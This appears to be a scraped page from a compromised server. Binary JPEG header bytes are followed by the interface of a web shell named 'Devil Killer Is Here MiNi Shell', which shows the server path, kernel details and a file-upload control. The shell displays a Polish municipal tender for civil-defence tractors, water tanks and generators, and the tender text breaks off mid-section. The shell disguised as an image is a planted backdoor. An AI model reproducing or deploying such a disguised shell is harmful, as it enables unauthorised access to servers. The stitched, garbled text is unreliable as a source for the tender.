JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250828/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250828/0039596701-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> ,,Zakup i dostawa ciągnika rolniczego, przyczepy ciągnikowej, cystern do przewozu wody pitnej i mobilnych agregatów prądotwórczych na potrzeby obrony cywilnej miasta Wysokie Mazowieckie ” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miejska Wysokie Mazowieckie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 450670143</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Ludowa 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wysokie Mazowieckie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">18-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL842 - Łomżyński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">862752592</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@wysokiemazowieckie.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.wysokiemazowieckie.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> ,,Zakup i dostawa ciągnika rolniczego, przyczepy ciągnikowej, cystern do przewozu wody pitnej i mobilnych agregatów prądotwórczych na potrzeby obrony cywilnej miasta Wysokie Mazowieckie ” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f2202fe5-52a0-4ff2-972f-f9a7c74d8349</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00395967</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-08-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-f2202fe5-52a0-4ff2-972f-f9a7c74d8349 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu platformy e- Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl. oraz poczty elektronicznej, z zastrzeżeniem że oferta może zostać<br/>przekazana wyłącznie za pomocą platformy e-Zamówienia.<br/>2.Komunikacja w postępowaniu na platformie e-Zamówienia, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze”<br/>w oknie „Formularze do komunikacji”. Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie<br/>wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi.<br/>Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”).<br/>3.Pozostała komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu poczty elektronicznej sekretariat@wysokiemazowieckie.pl ( nie dotyczy składania ofert).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Wykonawca zamierzający wziąć udział w postępowaniu musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>2.	Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania.<br/>3.	Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych.<br/>4. Oferty, oświadczenia o których mowa w art. 125 ust. 1 ustawy PZP, podmiotowe środki dowodowe, w tym zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w art. 118 ust. 3 ustawy <br/> PZP, zwane dalej „zobowiązaniem podmiotu udostępniającego zasoby”, przedmiotowe środki dowodowe, pełnomocnictwo, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, z uwzględnieniem rodzaju przekazanych danych i przekazuje się jako załączniki. W przypadku formatów, o których mowa w art.66 ust.1 ustawy Pzp, ww. regulacje nie będą miały bezpośredniego zastosowania. Pozostałe informacje zawiera SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>1)	administratorem Pani/Pana danych osobowych jest Gmina Miejska w Wysokiem Mazowieckiem, adres – ul. Ludowa 15, 18-200 Wysokie Mazowieckie, woj. podlaskie; <br/>2)	z inspektorem ochrony danych osobowych można skontaktować się: tel. 862752592, e-mail: sekretariat@wysokiemazowieckie.pl;<br/> Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego p.n. ,, Zakup i dostawa ciągnika rolniczego, przyczepy ciągnikowej, cystern do przewozu wody pitnej i mobilnych agregatów <br/> prądotwórczych na potrzeby obrony cywilnej miasta Wysokie Mazowieckie”<br/>3)	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019r. – Prawo zamówień publicznych , zwaną dalej „ustawa Pzp”; <br/>4)	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>5)	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>6)	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>7)	posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych ;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ; <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>8)	nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">MK. 271.20.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest: zakup i dostawa ciągnika rolniczego, przyczepy ciągnikowej, cystern do przewozu wody pitnej i mobilnych agregatów prądotwórczych na potrzeby obrony cywilnej miasta Wysokie Mazowieckie .<br/>Część I Dostawa ciągnika rolniczego i przyczepy ciągnikowej <br/>2. Szczegółowy opis przedmiotu zamówienia stanowi Załącznik nr 1a do SWZ.<br/>Przedmiot zamówienia obejmuje : dostawę, transport, rozładunek na wskazane przez Zamawiającego miejsce odbioru oraz szkolenie osób z obsługi sprzętu.<br/>4. Oferowany przedmiot zamówienia musi być fabrycznie nowy, kompletny, nieużywany, nieuszkodzony, wolny od wad , w pełni sprawny, nieobciążony prawami osób trzecich oraz nie jest przedmiotem żadnego postępowania sądowego (egzekucyjnego) bądź zabezpieczenia a także musi odpowiadać obowiązującym normom i posiadać niezbędne certyfikaty i atesty zgodne z obowiązującymi przepisami prawa.<br/>5. Dokumenty te zostaną przekazane Zamawiającemu przed podpisaniem protokołu odbioru. <br/>6. Wykonawca uprzedzi Zamawiającego o terminie dostawy na co najmniej 2 dni robocze przed jej planowanym rozpoczęciem.<br/>7. Sprzedający udziela gwarancji na przedmiot zamówienia: min. 24 miesiące. Gwarancja obejmuje serwis, wszystkie usterki, wady oraz uszkodzenia wykryte podczas użytkowania dostarczonego przedmiotu zamówienia. ( Okres gwarancji jest jednym z kryteriów oceny ofert.) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">16700000-2 - Ciągniki</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">34223300-9 - Przyczepy</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-11-28</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Łączna kwota ofertowa brutto (C)	60%	<br/> Cena najtańszej oferty<br/>C = ----------------------------------------- x100x 60%<br/> Cena badanej oferty<br/><br/>Okres gwarancji (G)	40%	<br/>24-28 miesięcy – 20 pkt., <br/>29-32 miesięcy – 30 pkt., <br/>33 - 36 miesięcy – 40 pkt., <br/>Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona wg poniższego wzoru: L=C+G<br/><br/>Gdzie:<br/>L- całkowita liczba punktów,<br/>C – punkty uzyskane w kryterium „Łączna kwota ofertowa brutto” <br/>G- okres gwarancji</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest: zakup i dostawa ciągnika rolniczego, przyczepy ciągnikowej, cystern do przewozu wody pitnej i mobilnych agregatów prądotwórczych na potrzeby obrony cywilnej miasta Wysokie Mazowieckie .<br/>Część II Dostawa cystern do przewozu wody pitnej <br/>2. Szczegółowy opis przedmiotu zamówienia stanowi Załącznik nr 1a do SWZ <br/>3. Przedmiot zamówienia obejmuje : dostawę, transport, rozładunek na wskazane przez Zamawiającego miejsce odbioru oraz szkolenie osób z obsługi sprzętu.<br/>4. Oferowany przedmiot zamówienia musi być fabrycznie nowy, kompletny, nieużywany, nieuszkodzony, wolny od wad , w pełni sprawny, nieobciążony prawami osób trzecich oraz nie jest przedmiotem żadnego postępowania sądowego (egzekucyjnego) bądź zabezpieczenia a także musi odpowiadać obowiązującym normom i posiadać niezbędne certyfikaty i atesty zgodne z obowiązującymi przepisami prawa.<br/>5. Dokumenty te zostaną przekazane Zamawiającemu przed podpisaniem protokołu odbioru. <br/>6. Wykonawca uprzedzi Zamawiającego o terminie dostawy na co najmniej 2 dni robocze przed jej planowanym rozpoczęciem.<br/>7. Sprzedający udziela gwarancji na przedmiot zamówienia: min. 24 miesiące. Gwarancja obejmuje serwis, wszystkie usterki, wady oraz uszkodzenia wykryte podczas użytkowania dostarczonego przedmiotu zamówienia. ( Okres gwarancji jest jednym z kryteriów oceny ofert.) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34223340-1 - Cysterny naczepowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-11-28</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Łączna kwota ofertowa brutto (C)	60%	<br/> Cena najtańszej oferty<br/>C = ----------------------------------------- x100x 60%<br/> Cena badanej oferty<br/><br/>Okres gwarancji (G)	40%	<br/>24-28 miesięcy – 20 pkt., <br/>29-32 miesięcy – 30 pkt., <br/>33 - 36 miesięcy – 40 pkt., <br/>Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona wg poniższego wzoru: L=C+G<br/><br/>Gdzie:<br/>L- całkowita liczba punktów,<br/>C – punkty uzyskane w kryterium „Łączna kwota ofertowa brutto” <br/>G- okres gwarancji</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest: zakup i dostawa ciągnika rolniczego, przyczepy ciągnikowej, cystern do przewozu wody pitnej i mobilnych agregatów prądotwórczych na potrzeby obrony cywilnej miasta Wysokie Mazowieckie .<br/>Część III Dostawa mobilnych agregatorów prądotwórczych <br/>2. Szczegółowy opis przedmiotu zamówienia stanowi Załącznik nr 1a do SWZ <br/>3. Przedmiot zamówienia obejmuje : dostawę, transport, rozładunek na wskazane przez Zamawiającego miejsce odbioru oraz szkolenie osób z obsługi sprzętu.<br/>4. Oferowany przedmiot zamówienia musi być fabrycznie nowy, kompletny, nieużywany, nieuszkodzony, wolny od wad , w pełni sprawny, nieobciążony prawami osób trzecich oraz nie jest przedmiotem żadnego postępowania sądowego (egzekucyjnego) bądź zabezpieczenia a także musi odpowiadać obowiązującym normom i posiadać niezbędne certyfikaty i atesty zgodne z obowiązującymi przepisami prawa.<br/>5. Dokumenty te zostaną przekazane Zamawiającemu przed podpisaniem protokołu odbioru. <br/>6. Wykonawca uprzedzi Zamawiającego o terminie dostawy na co najmniej 2 dni robocze przed jej planowanym rozpoczęciem.<br/>7. Sprzedający udziela gwarancji na przedmiot zamówienia: min. 24 miesiące. Gwarancja obejmuje serwis, wszystkie usterki, wady oraz uszkodzenia wykryte podczas użytkowania dostarczonego przedmiotu zamówienia. ( Okres gwarancji jest jednym z kryteriów oceny ofert.) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">31122000-7 - Jednostki prądotwórcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-11-28</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Łączna kwota ofertowa brutto (C)	60%	<br/> Cena najtańszej oferty<br/>C = ----------------------------------------- x100x 60%<br/> Cena badanej oferty<br/><br/>Okres gwarancji (G)	40%	<br/>24-28 miesięcy – 20 pkt., <br/>29-32 miesięcy – 30 pkt., <br/>33 - 36 miesięcy – 40 pkt., <br/>Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona wg poniższego wzoru: L=C+G<br/><br/>Gdzie:<br/>L- całkowita liczba punktów,<br/>C – punkty uzyskane w kryterium „Łączna kwota ofertowa brutto” <br/>G- okres gwarancji</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy 